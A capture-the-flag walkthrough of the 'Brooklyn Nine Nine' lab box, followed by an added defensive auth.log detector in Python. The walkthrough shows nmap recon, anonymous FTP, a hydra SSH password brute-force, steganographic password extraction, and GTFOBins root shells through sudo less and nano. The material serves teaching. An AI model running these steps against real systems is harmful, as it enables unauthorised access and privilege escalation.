Brooklyn Nine Nine

Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as online" flag (-Pn), which skips host discovery

nmap -Pn 10.10.146.230

Detailed nmap scan:

Command Breakdown:

  • (-sV): Service version detection

  • (-sC): Default nmap scripts

  • (-p): Specify ports 21, 22 and 80

  • (-oN nmap): Save the output in normal format to a file called nmap

nmap -sV -sC -p 21,22,80 -oN nmap 10.10.146.230

Enumeration

Port 21: FTP

Looks like we can log in through FTP as anonymous, so let's do that. (We use anonymous for both username and password, or you can just hit enter for the password.)

ftp 10.10.146.230

Let's list the files in this directory

Looks like there is a file which is a note to a person called Jake; let's transfer it to our machine and read what it has to say.

get note_to_jake.txt

Let's now read the file

Looks like Jake did not change his password, as mentioned by a person called Amy. We also have a username Holt, so we now have three usernames.

Port 80: HTTP

Let's visit the website

It's a Brooklyn Nine-Nine poster; let's look at the source code.

We have something interesting: they mention steganography, which is the practice of concealing a message within another message or file. So let's download the image onto our machine; the name of the image is in the source code.

wget http://10.10.146.230/brooklyn99.jpg

Exploitation

FTP

We can try to use hydra to find the password for Jake.

hydra -l jake -P /usr/share/wordlists/rockyou.txt ssh://10.10.146.230

We found the password, so let's log in through SSH.

ssh jake@10.10.146.230

And we are logged in. We can find the user flag here.

HTTP

We can use a tool called stegcracker to find hidden messages within files. If you do not have it, you can install it with this command

apt-get install stegcracker

Now you can run stegcracker against the image

stegcracker brooklyn99.jpg

We have the password, which should be the passphrase for the hidden file. Let's see what the image is hiding

steghide --extract -sf brooklyn99.jpg

Now we have the password for Holt, so let's log in through SSH.

ssh holt@10.10.146.230

Privilege Escalation

Jake

Let's run sudo -l to see what Jake can run as root.

sudo -l

Looks like we can run the less command as root, which lets us view the contents of any file, so let's use it to read /root/root.txt.

sudo /usr/bin/less /root/root.txt

We can also become root using the commands listed for less on GTFOBins.

Let's use these commands to become root.

sudo less /etc/profile
!/bin/sh

Holt

Let's run sudo -l to see what Holt can run as root.

sudo -l

We can run nano as root, so let's go to GTFOBins to find the commands to escalate privileges to root.

Let's run these commands

sudo nano
^R^X
reset; sh 1>&0 2>&0

We are now root. You can find the root flag in /root/
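From the defender's side, the two weaknesses this box chains (a guessable SSH password found by hydra, and sudo rights on less and nano that GTFOBins turns into a root shell) both leave traces in /var/log/auth.log. The Python below is an added example, not part of the original writeup, that runs a simple detector over constructed sample log lines; the host name, timestamps and the 192.0.2.10 source address are made up.

```python
import re
from collections import defaultdict

# Constructed sample auth.log lines for this example (not from the original
# writeup); host name, timestamps and the 192.0.2.10 source are made up.
SAMPLE_AUTH_LOG = """\
Jan  1 10:00:01 lab sshd[1201]: Failed password for jake from 192.0.2.10 port 40001 ssh2
Jan  1 10:00:02 lab sshd[1202]: Failed password for jake from 192.0.2.10 port 40002 ssh2
Jan  1 10:00:03 lab sshd[1203]: Failed password for jake from 192.0.2.10 port 40003 ssh2
Jan  1 10:00:04 lab sshd[1204]: Failed password for jake from 192.0.2.10 port 40004 ssh2
Jan  1 10:00:05 lab sshd[1205]: Failed password for jake from 192.0.2.10 port 40005 ssh2
Jan  1 10:00:06 lab sshd[1206]: Accepted password for jake from 192.0.2.10 port 40006 ssh2
Jan  1 10:00:30 lab sudo:     jake : TTY=pts/0 ; PWD=/home/jake ; USER=root ; COMMAND=/usr/bin/less /etc/profile
Jan  1 10:05:00 lab sudo:     holt : TTY=pts/1 ; PWD=/home/holt ; USER=root ; COMMAND=/bin/nano
Jan  1 10:06:00 lab sudo:     amy : TTY=pts/2 ; PWD=/home/amy ; USER=root ; COMMAND=/usr/bin/apt update
"""

FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+)")
ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted password for (\S+) from (\S+)")
SUDO_RE = re.compile(r"sudo:\s+(\S+) : .*?USER=(\S+) ; COMMAND=(\S+)")

# sudo rights on these binaries let the caller drop to a shell as the target
# user (less and nano are the two the writeup abuses); extend from GTFOBins.
SHELL_ESCAPE_BINARIES = {"less", "nano"}


def detect_ssh_bruteforce(lines, threshold=5):
    """Return {(user, src): (failed_count, success_followed)} for every
    (user, source) pair with at least `threshold` failed password logins."""
    failed = defaultdict(int)
    succeeded = set()
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            failed[m.groups()] += 1
        m = ACCEPTED_RE.search(line)
        if m and failed.get(m.groups(), 0) >= threshold:
            succeeded.add(m.groups())  # password guessed after a burst of failures
    return {k: (n, k in succeeded) for k, n in failed.items() if n >= threshold}


def detect_sudo_shell_escapes(lines):
    """Return (caller, target_user, binary) for sudo runs of shell-escape-capable
    binaries; with this box's sudoers rules these are the privilege escalation."""
    hits = []
    for line in lines:
        m = SUDO_RE.search(line)
        if m and m.group(3).rsplit("/", 1)[-1] in SHELL_ESCAPE_BINARIES:
            hits.append(m.groups())
    return hits
```

The same two checks are what a fail2ban jail (for the SSH bursts) and a sudoers review that refuses NOPASSWD rights on editors and pagers would prevent in the first place.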
